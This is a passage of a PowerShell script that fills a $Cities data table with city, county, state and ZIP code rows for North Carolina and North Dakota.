$null = $Cities.Rows.Add("Columbus","Polk","North carolina","NC","37","28722") + $null = $Cities.Rows.Add("Cullowhee","Jackson","North carolina","NC","37","28723") + $null = $Cities.Rows.Add("Dillsboro","Jackson","North carolina","NC","37","28725") + $null = $Cities.Rows.Add("East flat rock","Henderson","North carolina","NC","37","28726") + $null = $Cities.Rows.Add("Etowah","Henderson","North carolina","NC","37","28729") + $null = $Cities.Rows.Add("Fairview","Buncombe","North carolina","NC","37","28730") + $null = $Cities.Rows.Add("Flat rock","Henderson","North carolina","NC","37","28731") + $null = $Cities.Rows.Add("Fletcher","Henderson","North carolina","NC","37","28732") + $null = $Cities.Rows.Add("Fontana dam","Graham","North carolina","NC","37","28733") + $null = $Cities.Rows.Add("Franklin","Macon","North carolina","NC","37","28734") + $null = $Cities.Rows.Add("Gerton","Henderson","North carolina","NC","37","28735") + $null = $Cities.Rows.Add("Glenville","Jackson","North carolina","NC","37","28736") + $null = $Cities.Rows.Add("Hendersonville","Henderson","North carolina","NC","37","28739") + $null = $Cities.Rows.Add("Greenmountain","Yancey","North carolina","NC","37","28740") + $null = $Cities.Rows.Add("Highlands","Macon","North carolina","NC","37","28741") + $null = $Cities.Rows.Add("Horse shoe","Henderson","North carolina","NC","37","28742") + $null = $Cities.Rows.Add("Hot springs","Madison","North carolina","NC","37","28743") + $null = $Cities.Rows.Add("Lake junaluska","Haywood","North carolina","NC","37","28745") + $null = $Cities.Rows.Add("Lake lure","Rutherford","North carolina","NC","37","28746") + $null = $Cities.Rows.Add("Lake toxaway","Transylvania","North carolina","NC","37","28747") + $null = $Cities.Rows.Add("Leicester","Buncombe","North carolina","NC","37","28748") + $null = $Cities.Rows.Add("Little switzerla","Mitchell","North carolina","NC","37","28749") + $null = $Cities.Rows.Add("Maggie valley","Haywood","North carolina","NC","37","28751") + $null = $Cities.Rows.Add("Marion","McDowell","North carolina","NC","37","28752") + $null = $Cities.Rows.Add("Walnut","Madison","North carolina","NC","37","28753") + $null = $Cities.Rows.Add("Mars hill","Madison","North carolina","NC","37","28754") + $null = $Cities.Rows.Add("Micaville","Yancey","North carolina","NC","37","28755") + $null = $Cities.Rows.Add("Mill spring","Polk","North carolina","NC","37","28756") + $null = $Cities.Rows.Add("Montreat","Buncombe","North carolina","NC","37","28757") + $null = $Cities.Rows.Add("Mountain home","Henderson","North carolina","NC","37","28758") + $null = $Cities.Rows.Add("Nebo","McDowell","North carolina","NC","37","28761") + $null = $Cities.Rows.Add("Old fort","McDowell","North carolina","NC","37","28762") + $null = $Cities.Rows.Add("Otto","Macon","North carolina","NC","37","28763") + $null = $Cities.Rows.Add("Penland","Mitchell","North carolina","NC","37","28765") + $null = $Cities.Rows.Add("Penrose","Transylvania","North carolina","NC","37","28766") + $null = $Cities.Rows.Add("Pisgah forest","Transylvania","North carolina","NC","37","28768") + $null = $Cities.Rows.Add("Robbinsville","Graham","North carolina","NC","37","28771") + $null = $Cities.Rows.Add("Rosman","Transylvania","North carolina","NC","37","28772") + $null = $Cities.Rows.Add("Saluda","Polk","North carolina","NC","37","28773") + $null = $Cities.Rows.Add("Sapphire","Jackson","North carolina","NC","37","28774") + $null = $Cities.Rows.Add("Spruce pine","Mitchell","North carolina","NC","37","28777") + $null = $Cities.Rows.Add("Warren wilson co","Buncombe","North carolina","NC","37","28778") + $null = $Cities.Rows.Add("Sylva","Jackson","North carolina","NC","37","28779") + $null = $Cities.Rows.Add("Topton","Macon","North carolina","NC","37","28781") + $null = $Cities.Rows.Add("Tryon","Polk","North carolina","NC","37","28782") + $null = $Cities.Rows.Add("Tuckasegee","Jackson","North carolina","NC","37","28783") + $null = $Cities.Rows.Add("Tuxedo","Henderson","North carolina","NC","37","28784") + $null = $Cities.Rows.Add("Waynesville","Haywood","North carolina","NC","37","28786") + $null = $Cities.Rows.Add("Weaverville","Buncombe","North carolina","NC","37","28787") + $null = $Cities.Rows.Add("Whittier","Jackson","North carolina","NC","37","28789") + $null = $Cities.Rows.Add("Zirconia","Henderson","North carolina","NC","37","28790") + $null = $Cities.Rows.Add("Zcta 28791","Henderson","North carolina","NC","37","28791") + $null = $Cities.Rows.Add("Hendersonville","Henderson","North carolina","NC","37","28792") + $null = $Cities.Rows.Add("Zcta 287hh","Buncombe","North carolina","NC","37","287HH") + $null = $Cities.Rows.Add("Zcta 287xx","Swain","North carolina","NC","37","287XX") + $null = $Cities.Rows.Add("Asheville","Buncombe","North carolina","NC","37","28801") + $null = $Cities.Rows.Add("Asheville","Buncombe","North carolina","NC","37","28803") + $null = $Cities.Rows.Add("Asheville","Buncombe","North carolina","NC","37","28804") + $null = $Cities.Rows.Add("Asheville","Buncombe","North carolina","NC","37","28805") + $null = $Cities.Rows.Add("Asheville","Buncombe","North carolina","NC","37","28806") + $null = $Cities.Rows.Add("Zcta 288hh","Buncombe","North carolina","NC","37","288HH") + $null = $Cities.Rows.Add("Andrews","Cherokee","North carolina","NC","37","28901") + $null = $Cities.Rows.Add("Brasstown","Clay","North carolina","NC","37","28902") + $null = $Cities.Rows.Add("Hayesville","Clay","North carolina","NC","37","28904") + $null = $Cities.Rows.Add("Marble","Cherokee","North carolina","NC","37","28905") + $null = $Cities.Rows.Add("Unaka","Cherokee","North carolina","NC","37","28906") + $null = $Cities.Rows.Add("Warne","Clay","North carolina","NC","37","28909") + $null = $Cities.Rows.Add("Zcta 289hh","Cherokee","North carolina","NC","37","289HH") + $null = $Cities.Rows.Add("","Adams","North dakota","ND","38","57638") + $null = $Cities.Rows.Add("Abercrombie","Richland","North dakota","ND","38","58001") + $null = $Cities.Rows.Add("Amenia","Cass","North dakota","ND","38","58004") + $null = $Cities.Rows.Add("Argusville","Cass","North dakota","ND","38","58005") + $null = $Cities.Rows.Add("Arthur","Cass","North dakota","ND","38","58006") + $null = $Cities.Rows.Add("Ayr","Cass","North dakota","ND","38","58007") + $null = $Cities.Rows.Add("Barney","Richland","North dakota","ND","38","58008") + $null = $Cities.Rows.Add("Blanchard","Traill","North dakota","ND","38","58009") + $null = $Cities.Rows.Add("Buffalo","Cass","North dakota","ND","38","58011") + $null = $Cities.Rows.Add("Casselton","Cass","North dakota","ND","38","58012") + $null = $Cities.Rows.Add("Cayuga","Sargent","North dakota","ND","38","58013") + $null = $Cities.Rows.Add("Christine","Richland","North dakota","ND","38","58015") + $null = $Cities.Rows.Add("Clifford","Traill","North dakota","ND","38","58016") + $null = $Cities.Rows.Add("Brampton","Sargent","North dakota","ND","38","58017") + $null = $Cities.Rows.Add("Colfax","Richland","North dakota","ND","38","58018") + $null = $Cities.Rows.Add("Davenport","Cass","North dakota","ND","38","58021") + $null = $Cities.Rows.Add("Enderlin","Ransom","North dakota","ND","38","58027") + $null = $Cities.Rows.Add("Erie","Cass","North dakota","ND","38","58029") + $null = $Cities.Rows.Add("Fairmount","Richland","North dakota","ND","38","58030") + $null = $Cities.Rows.Add("Fingal","Barnes","North dakota","ND","38","58031") + $null = $Cities.Rows.Add("Forman","Sargent","North dakota","ND","38","58032") + $null = $Cities.Rows.Add("Englevale","Ransom","North dakota","ND","38","58033") + $null = $Cities.Rows.Add("Galesburg","Traill","North dakota","ND","38","58035") + $null = $Cities.Rows.Add("Gardner","Cass","North dakota","ND","38","58036") + $null = $Cities.Rows.Add("Grandin","Cass","North dakota","ND","38","58038") + $null = $Cities.Rows.Add("Great bend","Richland","North dakota","ND","38","58039") + $null = $Cities.Rows.Add("Crete","Sargent","North dakota","ND","38","58040") + $null = $Cities.Rows.Add("Hankinson","Richland","North dakota","ND","38","58041") + $null = $Cities.Rows.Add("Prosper","Cass","North dakota","ND","38","58042") + $null = $Cities.Rows.Add("Havana","Sargent","North dakota","ND","38","58043") + $null = $Cities.Rows.Add("Kelso","Traill","North dakota","ND","38","58045") + $null = $Cities.Rows.Add("Colgate","Steele","North dakota","ND","38","58046") + $null = $Cities.Rows.Add("Hickson","Cass","North dakota","ND","38","58047") + $null = $Cities.Rows.Add("Hunter","Cass","North dakota","ND","38","58048") + $null = $Cities.Rows.Add("Hastings","Barnes","North dakota","ND","38","58049") + $null = $Cities.Rows.Add("Kindred","Cass","North dakota","ND","38","58051") + $null = $Cities.Rows.Add("Leonard","Cass","North dakota","ND","38","58052") + $null = $Cities.Rows.Add("Geneseo","Richland","North dakota","ND","38","58053") + $null = $Cities.Rows.Add("Elliott","Ransom","North dakota","ND","38","58054") + $null = $Cities.Rows.Add("Luverne","Steele","North dakota","ND","38","58056") + $null = $Cities.Rows.Add("Mcleod","Richland","North dakota","ND","38","58057") + $null = $Cities.Rows.Add("Mantador","Richland","North dakota","ND","38","58058") + $null = $Cities.Rows.Add("Durbin","Cass","North dakota","ND","38","58059") + $null = $Cities.Rows.Add("Delamere","Sargent","North dakota","ND","38","58060") + $null = $Cities.Rows.Add("Mooreton","Richland","North dakota","ND","38","58061") + $null = $Cities.Rows.Add("Nome","Barnes","North dakota","ND","38","58062") + $null = $Cities.Rows.Add("Oriska","Barnes","North dakota","ND","38","58063") + $null = $Cities.Rows.Add("Page","Cass","North dakota","ND","38","58064") + $null = $Cities.Rows.Add("Rutland","Sargent","North dakota","ND","38","58067") + $null = $Cities.Rows.Add("Sheldon","Ransom","North dakota","ND","38","58068") + $null = $Cities.Rows.Add("Stirum","Sargent","North dakota","ND","38","58069") + $null = $Cities.Rows.Add("Tower city","Cass","North dakota","ND","38","58071") + $null = $Cities.Rows.Add("Valley city","Barnes","North dakota","ND","38","58072") + $null = $Cities.Rows.Add("Dwight","Richland","North dakota","ND","38","58075") + $null = $Cities.Rows.Add("Walcott","Richland","North dakota","ND","38","58077") + $null = $Cities.Rows.Add("Riverside","Cass","North dakota","ND","38","58078") + $null = $Cities.Rows.Add("Embden","Cass","North dakota","ND","38","58079") + $null = $Cities.Rows.Add("Wyndmere","Richland","North dakota","ND","38","58081") + $null = $Cities.Rows.Add("Zcta 580hh","Barnes","North dakota","ND","38","580HH") + $null = $Cities.Rows.Add("North river","Cass","North dakota","ND","38","58102") + $null = $Cities.Rows.Add("Fargo","Cass","North dakota","ND","38","58103") + $null = $Cities.Rows.Add("Briarwood","Cass","North dakota","ND","38","58104") + $null = $Cities.Rows.Add("Grand forks","Grand Forks","North dakota","ND","38","58201") + $null = $Cities.Rows.Add("Grand forks","Grand Forks","North dakota","ND","38","58202") + $null = $Cities.Rows.Add("Grand forks","Grand Forks","North dakota","ND","38","58203") + $null = $Cities.Rows.Add("Grand forks afb","Grand Forks","North dakota","ND","38","58204") + $null = $Cities.Rows.Add("Adams","Walsh","North dakota","ND","38","58210") + $null = $Cities.Rows.Add("Aneta","Nelson","North dakota","ND","38","58212") + $null = $Cities.Rows.Add("Ardoch","Walsh","North dakota","ND","38","58213") + $null = $Cities.Rows.Add("Arvilla","Grand Forks","North dakota","ND","38","58214") + $null = $Cities.Rows.Add("Bathgate","Pembina","North dakota","ND","38","58216") + $null = $Cities.Rows.Add("Buxton","Traill","North dakota","ND","38","58218") + $null = $Cities.Rows.Add("Caledonia","Traill","North dakota","ND","38","58219") + $null = $Cities.Rows.Add("Concrete","Pembina","North dakota","ND","38","58220") + $null = $Cities.Rows.Add("Crystal","Pembina","North dakota","ND","38","58222") + $null = $Cities.Rows.Add("Cummings","Traill","North dakota","ND","38","58223") + $null = $Cities.Rows.Add("Dahlen","Nelson","North dakota","ND","38","58224") + $null = $Cities.Rows.Add("Bowesmont","Pembina","North dakota","ND","38","58225") + $null = $Cities.Rows.Add("Gardar","Walsh","North dakota","ND","38","58227") + $null = $Cities.Rows.Add("Emerado","Grand Forks","North dakota","ND","38","58228") + $null = $Cities.Rows.Add("Fairdale","Walsh","North dakota","ND","38","58229") + $null = $Cities.Rows.Add("Finley","Steele","North dakota","ND","38","58230") + $null = $Cities.Rows.Add("Fordville","Walsh","North dakota","ND","38","58231") + $null = $Cities.Rows.Add("Forest river","Walsh","North dakota","ND","38","58233") + $null = $Cities.Rows.Add("Honeyford","Grand Forks","North dakota","ND","38","58235") + $null = $Cities.Rows.Add("Glasston","Pembina","North dakota","ND","38","58236") + $null = $Cities.Rows.Add("Nash","Walsh","North dakota","ND","38","58237") + $null = $Cities.Rows.Add("Hamilton","Pembina","North dakota","ND","38","58238") + $null = $Cities.Rows.Add("Hannah","Cavalier","North dakota","ND","38","58239") + $null = $Cities.Rows.Add("Hatton","Traill","North dakota","ND","38","58240") + $null = $Cities.Rows.Add("Hensel","Pembina","North dakota","ND","38","58241") + $null = $Cities.Rows.Add("Hoople","Walsh","North dakota","ND","38","58243") + $null = $Cities.Rows.Add("Orr","Grand Forks","North dakota","ND","38","58244") + $null = $Cities.Rows.Add("Langdon","Cavalier","North dakota","ND","38","58249") + $null = $Cities.Rows.Add("Lankin","Walsh","North dakota","ND","38","58250") + $null = $Cities.Rows.Add("Mccanna","Grand Forks","North dakota","ND","38","58251") + $null = $Cities.Rows.Add("Kloten","Nelson","North dakota","ND","38","58254") + $null = $Cities.Rows.Add("Maida","Cavalier","North dakota","ND","38","58255") + $null = $Cities.Rows.Add("Manvel","Grand Forks","North dakota","ND","38","58256") + $null = $Cities.Rows.Add("Mayville","Traill","North dakota","ND","38","58257") + $null = $Cities.Rows.Add("Mekinock","Grand Forks","North dakota","ND","38","58258") + $null = $Cities.Rows.Add("Whitman","Nelson","North dakota","ND","38","58259") + $null = $Cities.Rows.Add("Milton","Cavalier","North dakota","ND","38","58260") + $null = $Cities.Rows.Add("Voss","Walsh","North dakota","ND","38","58261") + $null = $Cities.Rows.Add("Mountain","Pembina","North dakota","ND","38","58262") + $null = $Cities.Rows.Add("Neche","Pembina","North dakota","ND","38","58265") + $null = $Cities.Rows.Add("Niagara","Grand Forks","North dakota","ND","38","58266") + $null = $Cities.Rows.Add("Kempton","Grand Forks","North dakota","ND","38","58267") + $null = $Cities.Rows.Add("Osnabrock","Cavalier","North dakota","ND","38","58269") + $null = $Cities.Rows.Add("Park river","Walsh","North dakota","ND","38","58270") + $null = $Cities.Rows.Add("Joliette","Pembina","North dakota","ND","38","58271") + $null = $Cities.Rows.Add("Petersburg","Nelson","North dakota","ND","38","58272") + $null = $Cities.Rows.Add("Pisek","Walsh","North dakota","ND","38","58273") + $null = $Cities.Rows.Add("Portland","Traill","North dakota","ND","38","58274") + $null = $Cities.Rows.Add("Reynolds","Grand Forks","North dakota","ND","38","58275") + $null = $Cities.Rows.Add("Saint thomas","Pembina","North dakota","ND","38","58276") + $null = $Cities.Rows.Add("Sharon","Steele","North dakota","ND","38","58277") + $null = $Cities.Rows.Add("Thompson","Grand Forks","North dakota","ND","38","58278") + $null = $Cities.Rows.Add("Wales","Cavalier","North dakota","ND","38","58281") + $null = $Cities.Rows.Add("Backoo","Pembina","North dakota","ND","38","58282") + $null = $Cities.Rows.Add("Zcta 582hh","Grand Forks","North dakota","ND","38","582HH") + $null = $Cities.Rows.Add("Devils lake","Ramsey","North dakota","ND","38","58301") + $null = $Cities.Rows.Add("Agate","Rolette","North dakota","ND","38","58310") + $null = $Cities.Rows.Add("Loma","Cavalier","North dakota","ND","38","58311") + $null = $Cities.Rows.Add("Balta","Pierce","North dakota","ND","38","58313") + $null = $Cities.Rows.Add("Belcourt","Rolette","North dakota","ND","38","58316") + $null = $Cities.Rows.Add("Bisbee","Towner","North dakota","ND","38","58317") + $null = $Cities.Rows.Add("Bottineau","Bottineau","North dakota","ND","38","58318") + $null = $Cities.Rows.Add("Brocket","Ramsey","North dakota","ND","38","58321") + $null = $Cities.Rows.Add("Calvin","Cavalier","North dakota","ND","38","58323") + $null = $Cities.Rows.Add("Maza","Towner","North dakota","ND","38","58324") + $null = $Cities.Rows.Add("Churchs ferry","Ramsey","North dakota","ND","38","58325") + $null = $Cities.Rows.Add("Southam","Ramsey","North dakota","ND","38","58327") + $null = $Cities.Rows.Add("San haven","Rolette","North dakota","ND","38","58329") + $null = $Cities.Rows.Add("Edmore","Ramsey","North dakota","ND","38","58330") + $null = $Cities.Rows.Add("Egeland","Towner","North dakota","ND","38","58331") + $null = $Cities.Rows.Add("Fillmore","Benson","North dakota","ND","38","58332") + $null = $Cities.Rows.Add("Fort totten","Benson","North dakota","ND","38","58335") + $null = $Cities.Rows.Add("Hampden","Ramsey","North dakota","ND","38","58338") + $null = $Cities.Rows.Add("Manfred","Wells","North dakota","ND","38","58341") + $null = $Cities.Rows.Add("Knox","Benson","North dakota","ND","38","58343") + $null = $Cities.Rows.Add("Mapes","Nelson","North dakota","ND","38","58344") + $null = $Cities.Rows.Add("Lawton","Ramsey","North dakota","ND","38","58345") + $null = $Cities.Rows.Add("Harlow","Benson","North dakota","ND","38","58346") + $null = $Cities.Rows.Add("Flora","Benson","North dakota","ND","38","58348") + $null = $Cities.Rows.Add("Minnewaukan","Benson","North dakota","ND","38","58351") + $null = $Cities.Rows.Add("Calio","Cavalier","North dakota","ND","38","58352") + $null = $Cities.Rows.Add("Mylo","Rolette","North dakota","ND","38","58353") + $null = $Cities.Rows.Add("Nekoma","Cavalier","North dakota","ND","38","58355") + $null = $Cities.Rows.Add("Brantford","Eddy","North dakota","ND","38","58356") + $null = $Cities.Rows.Add("Oberon","Benson","North dakota","ND","38","58357") + $null = $Cities.Rows.Add("Orrin","Pierce","North dakota","ND","38","58359") + $null = $Cities.Rows.Add("Pekin","Nelson","North dakota","ND","38","58361") + $null = $Cities.Rows.Add("Penn","Ramsey","North dakota","ND","38","58362") + $null = $Cities.Rows.Add("Perth","Towner","North dakota","ND","38","58363") + $null = $Cities.Rows.Add("Rocklake","Towner","North dakota","ND","38","58365") + $null = $Cities.Rows.Add("Nanson","Rolette","North dakota","ND","38","58366") + $null = $Cities.Rows.Add("Rolla","Rolette","North dakota","ND","38","58367") + $null = $Cities.Rows.Add("Pleasant lake","Pierce","North dakota","ND","38","58368") + $null = $Cities.Rows.Add("Saint john","Rolette","North dakota","ND","38","58369") + $null = $Cities.Rows.Add("Saint michael","Benson","North dakota","ND","38","58370") + $null = $Cities.Rows.Add("Sarles","Cavalier","North dakota","ND","38","58372") + $null = $Cities.Rows.Add("Sheyenne","Eddy","North dakota","ND","38","58374") + $null = $Cities.Rows.Add("Starkweather","Ramsey","North dakota","ND","38","58377") + $null = $Cities.Rows.Add("Tokio","Benson","North dakota","ND","38","58379") + $null = $Cities.Rows.Add("Hamar","Nelson","North dakota","ND","38","58380") + $null = $Cities.Rows.Add("Warwick","Benson","North dakota","ND","38","58381") + $null = $Cities.Rows.Add("Webster","Ramsey","North dakota","ND","38","58382") + $null = $Cities.Rows.Add("Willow city","Bottineau","North dakota","ND","38","58384") + $null = $Cities.Rows.Add("Wolford","Pierce","North dakota","ND","38","58385") + $null = $Cities.Rows.Add("Baker","Benson","North dakota","ND","38","58386") + $null = $Cities.Rows.Add("Zcta 583hh","Benson","North dakota","ND","38","583HH") + $null = $Cities.Rows.Add("Eldridge","Stutsman","North dakota","ND","38","58401") + $null = $Cities.Rows.Add("Ashley","McIntosh","North dakota","ND","38","58413") + $null = $Cities.Rows.Add("Berlin","LaMoure","North dakota","ND","38","58415") + $null = $Cities.Rows.Add("Binford","Griggs","North dakota","ND","38","58416") + $null = $Cities.Rows.Add("Bowdon","Wells","North dakota","ND","38","58418") + $null = $Cities.Rows.Add("Buchanan","Stutsman","North dakota","ND","38","58420") + $null = $Cities.Rows.Add("Bordulac","Foster","North dakota","ND","38","58421") + $null = $Cities.Rows.Add("Emrick","Wells","North dakota","ND","38","58422") + $null = $Cities.Rows.Add("Chaseley","Wells","North dakota","ND","38","58423") + $null = $Cities.Rows.Add("Windsor","Stutsman","North dakota","ND","38","58424") + $null = $Cities.Rows.Add("Cooperstown","Griggs","North dakota","ND","38","58425") + $null = $Cities.Rows.Add("Courtenay","Stutsman","North dakota","ND","38","58426") + $null = $Cities.Rows.Add("Dawson","Kidder","North dakota","ND","38","58428") + $null = $Cities.Rows.Add("Sibley","Barnes","North dakota","ND","38","58429") + $null = $Cities.Rows.Add("Denhoff","Sheridan","North dakota","ND","38","58430") + $null = $Cities.Rows.Add("Dickey","LaMoure","North dakota","ND","38","58431") + $null = $Cities.Rows.Add("Merricourt","LaMoure","North dakota","ND","38","58433") + $null = $Cities.Rows.Add("Ellendale","Dickey","North dakota","ND","38","58436") + $null = $Cities.Rows.Add("Fessenden","Wells","North dakota","ND","38","58438") + $null = $Cities.Rows.Add("Forbes","Dickey","North dakota","ND","38","58439") + $null = $Cities.Rows.Add("Fredonia","Logan","North dakota","ND","38","58440") + $null = $Cities.Rows.Add("Fullerton","Dickey","North dakota","ND","38","58441") + $null = $Cities.Rows.Add("Gackle","Logan","North dakota","ND","38","58442") + $null = $Cities.Rows.Add("Juanita","Foster","North dakota","ND","38","58443") + $null = $Cities.Rows.Add("Goodrich","Sheridan","North dakota","ND","38","58444") + $null = $Cities.Rows.Add("Grace city","Foster","North dakota","ND","38","58445") + $null = $Cities.Rows.Add("Walum","Griggs","North dakota","ND","38","58448") + $null = $Cities.Rows.Add("Hurdsfield","Wells","North dakota","ND","38","58451") + $null = $Cities.Rows.Add("Nortonville","LaMoure","North dakota","ND","38","58454") + $null = $Cities.Rows.Add("Kensal","Stutsman","North dakota","ND","38","58455") + $null = $Cities.Rows.Add("Kulm","LaMoure","North dakota","ND","38","58456") + $null = $Cities.Rows.Add("Grand rapids","LaMoure","North dakota","ND","38","58458") + $null = $Cities.Rows.Add("Lehr","Logan","North dakota","ND","38","58460") + $null = $Cities.Rows.Add("Litchville","Barnes","North dakota","ND","38","58461") + $null = $Cities.Rows.Add("Mcclusky","Sheridan","North dakota","ND","38","58463") + $null = $Cities.Rows.Add("Mchenry","Foster","North dakota","ND","38","58464") + $null = $Cities.Rows.Add("Marion","LaMoure","North dakota","ND","38","58466") + $null = $Cities.Rows.Add("Medina","Stutsman","North dakota","ND","38","58467") + $null = $Cities.Rows.Add("Adrian","Stutsman","North dakota","ND","38","58472") + $null = $Cities.Rows.Add("Guelph","Dickey","North dakota","ND","38","58474") + $null = $Cities.Rows.Add("Pettibone","Kidder","North dakota","ND","38","58475") + $null = $Cities.Rows.Add("Edmunds","Stutsman","North dakota","ND","38","58476") + $null = $Cities.Rows.Add("Regan","Burleigh","North dakota","ND","38","58477") + $null = $Cities.Rows.Add("Lake williams","Kidder","North dakota","ND","38","58478") + $null = $Cities.Rows.Add("Leal","Barnes","North dakota","ND","38","58479") + $null = $Cities.Rows.Add("Sanborn","Barnes","North dakota","ND","38","58480") + $null = $Cities.Rows.Add("Spiritwood","Barnes","North dakota","ND","38","58481") + $null = $Cities.Rows.Add("Steele","Kidder","North dakota","ND","38","58482") + $null = $Cities.Rows.Add("Streeter","Stutsman","North dakota","ND","38","58483") + $null = $Cities.Rows.Add("Sutton","Griggs","North dakota","ND","38","58484") + $null = $Cities.Rows.Add("Sykeston","Wells","North dakota","ND","38","58486") + $null = $Cities.Rows.Add("Tappen","Kidder","North dakota","ND","38","58487") + $null = $Cities.Rows.Add("Tuttle","Kidder","North dakota","ND","38","58488") + $null = $Cities.Rows.Add("Venturia","McIntosh","North dakota","ND","38","58489") + $null = $Cities.Rows.Add("Verona","LaMoure","North dakota","ND","38","58490") + $null = $Cities.Rows.Add("Wimbledon","Barnes","North dakota","ND","38","58492") + $null = $Cities.Rows.Add("Wing","Burleigh","North dakota","ND","38","58494") + $null = $Cities.Rows.Add("Burnstad","McIntosh","North dakota","ND","38","58495") + $null = $Cities.Rows.Add("Woodworth","Stutsman","North dakota","ND","38","58496") + $null = $Cities.Rows.Add("Ypsilanti","Stutsman","North dakota","ND","38","58497") + $null = $Cities.Rows.Add("Zcta 584hh","Barnes","North dakota","ND","38","584HH") + $null = $Cities.Rows.Add("Bismarck","Burleigh","North dakota","ND","38","58501") + $null = $Cities.Rows.Add("Lincoln","Burleigh","North dakota","ND","38","58504") + $null = $Cities.Rows.Add("Bismarck","Burleigh","North dakota","ND","38","58505") + $null = $Cities.Rows.Add("Almont","Morton","North dakota","ND","38","58520") + $null = $Cities.Rows.Add("Baldwin","Burleigh","North dakota","ND","38","58521") + $null = $Cities.Rows.Add("Beulah","Mercer","North dakota","ND","38","58523") + $null = $Cities.Rows.Add("Braddock","Emmons","North dakota","ND","38","58524") + $null = $Cities.Rows.Add("Cannon ball","Sioux","North dakota","ND","38","58528") + $null = $Cities.Rows.Add("Carson","Grant","North dakota","ND","38","58529") + $null = $Cities.Rows.Add("Fort clark","Oliver","North dakota","ND","38","58530") + $null = $Cities.Rows.Add("Coleharbor","McLean","North dakota","ND","38","58531") + $null = $Cities.Rows.Add("Driscoll","Burleigh","North dakota","ND","38","58532") + $null = $Cities.Rows.Add("Heil","Grant","North dakota","ND","38","58533") + $null = $Cities.Rows.Add("Lark","Morton","North dakota","ND","38","58535") + $null = $Cities.Rows.Add("Fort yates","Sioux","North dakota","ND","38","58538") + $null = $Cities.Rows.Add("Emmet","McLean","North dakota","ND","38","58540") + $null = $Cities.Rows.Add("Golden valley","Mercer","North dakota","ND","38","58541") + $null = $Cities.Rows.Add("Hague","Emmons","North dakota","ND","38","58542") + $null = $Cities.Rows.Add("Hazelton","Emmons","North dakota","ND","38","58544") + $null = $Cities.Rows.Add("Hazen","Mercer","North dakota","ND","38","58545") + $null = $Cities.Rows.Add("Kintyre","Emmons","North dakota","ND","38","58549") + $null = $Cities.Rows.Add("Temvik","Emmons","North dakota","ND","38","58552") + $null = $Cities.Rows.Add("Mckenzie","Burleigh","North dakota","ND","38","58553") + $null = $Cities.Rows.Add("Mandan","Morton","North dakota","ND","38","58554") + $null = $Cities.Rows.Add("Menoken","Burleigh","North dakota","ND","38","58558") + $null = $Cities.Rows.Add("Mercer","McLean","North dakota","ND","38","58559") + $null = $Cities.Rows.Add("Moffit","Burleigh","North dakota","ND","38","58560") + $null = $Cities.Rows.Add("Napoleon","Logan","North dakota","ND","38","58561") + $null = $Cities.Rows.Add("Bentley","Grant","North dakota","ND","38","58562") + $null = $Cities.Rows.Add("Hannover","Morton","North dakota","ND","38","58563") + $null = $Cities.Rows.Add("Raleigh","Grant","North dakota","ND","38","58564") + $null = $Cities.Rows.Add("Riverdale","McLean","North dakota","ND","38","58565") + $null = $Cities.Rows.Add("Saint anthony","Morton","North dakota","ND","38","58566") + $null = $Cities.Rows.Add("Selfridge","Sioux","North dakota","ND","38","58568") + $null = $Cities.Rows.Add("Shields","Grant","North dakota","ND","38","58569") + $null = $Cities.Rows.Add("Breien","Morton","North dakota","ND","38","58570") + $null = $Cities.Rows.Add("Stanton","Mercer","North dakota","ND","38","58571") + $null = $Cities.Rows.Add("Sterling","Burleigh","North dakota","ND","38","58572") + $null = $Cities.Rows.Add("Strasburg","Emmons","North dakota","ND","38","58573") + $null = $Cities.Rows.Add("Turtle lake","McLean","North dakota","ND","38","58575") + $null = $Cities.Rows.Add("Underwood","McLean","North dakota","ND","38","58576") + $null = $Cities.Rows.Add("Washburn","McLean","North dakota","ND","38","58577") + $null = $Cities.Rows.Add("Wilton","McLean","North dakota","ND","38","58579") + $null = $Cities.Rows.Add("Zap","Mercer","North dakota","ND","38","58580") + $null = $Cities.Rows.Add("Zeeland","McIntosh","North dakota","ND","38","58581") + $null = $Cities.Rows.Add("Zcta 585hh","Emmons","North dakota","ND","38","585HH") + $null = $Cities.Rows.Add("New hradec","Stark","North dakota","ND","38","58601") + $null = $Cities.Rows.Add("Amidon","Slope","North dakota","ND","38","58620") + $null = $Cities.Rows.Add("Beach","Golden Valley","North dakota","ND","38","58621") + $null = $Cities.Rows.Add("Fryburg","Stark","North dakota","ND","38","58622") + $null = $Cities.Rows.Add("Bowman","Bowman","North dakota","ND","38","58623") + $null = $Cities.Rows.Add("Dodge","Dunn","North dakota","ND","38","58625") + $null = $Cities.Rows.Add("Dunn center","Dunn","North dakota","ND","38","58626") + $null = $Cities.Rows.Add("Gorham","Billings","North dakota","ND","38","58627") + $null = $Cities.Rows.Add("Gladstone","Stark","North dakota","ND","38","58630") + $null = $Cities.Rows.Add("Glen ullin","Morton","North dakota","ND","38","58631") + $null = $Cities.Rows.Add("Golva","Golden Valley","North dakota","ND","38","58632") + $null = $Cities.Rows.Add("Grassy butte","McKenzie","North dakota","ND","38","58634") + $null = $Cities.Rows.Add("Werner","Dunn","North dakota","ND","38","58636") + $null = $Cities.Rows.Add("Hebron","Morton","North dakota","ND","38","58638") + $null = $Cities.Rows.Add("Bucyrus","Adams","North dakota","ND","38","58639") + $null = $Cities.Rows.Add("Killdeer","Dunn","North dakota","ND","38","58640") + $null = $Cities.Rows.Add("Lefor","Stark","North dakota","ND","38","58641") + $null = $Cities.Rows.Add("Manning","Dunn","North dakota","ND","38","58642") + $null = $Cities.Rows.Add("Marmarth","Slope","North dakota","ND","38","58643") + $null = $Cities.Rows.Add("Medora","Billings","North dakota","ND","38","58645") + $null = $Cities.Rows.Add("Burt","Hettinger","North dakota","ND","38","58646") + $null = $Cities.Rows.Add("New england","Hettinger","North dakota","ND","38","58647") + $null = $Cities.Rows.Add("Reeder","Adams","North dakota","ND","38","58649") + $null = $Cities.Rows.Add("Regent","Hettinger","North dakota","ND","38","58650") + $null = $Cities.Rows.Add("Rhame","Bowman","North dakota","ND","38","58651") + $null = $Cities.Rows.Add("Richardton","Stark","North dakota","ND","38","58652") + $null = $Cities.Rows.Add("Gascoyne","Bowman","North dakota","ND","38","58653") + $null = $Cities.Rows.Add("Sentinel butte","Golden Valley","North dakota","ND","38","58654") + $null = $Cities.Rows.Add("South heart","Stark","North dakota","ND","38","58655") + $null = $Cities.Rows.Add("Taylor","Stark","North dakota","ND","38","58656") + $null = $Cities.Rows.Add("Zcta 586xx","Billings","North dakota","ND","38","586XX") + $null = $Cities.Rows.Add("Minot","Ward","North dakota","ND","38","58701") + $null = $Cities.Rows.Add("Zcta 58703","Ward","North dakota","ND","38","58703") + $null = 